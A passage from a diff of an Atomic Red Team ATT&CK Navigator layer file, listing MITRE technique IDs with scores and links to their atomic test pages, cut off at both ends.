omics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T10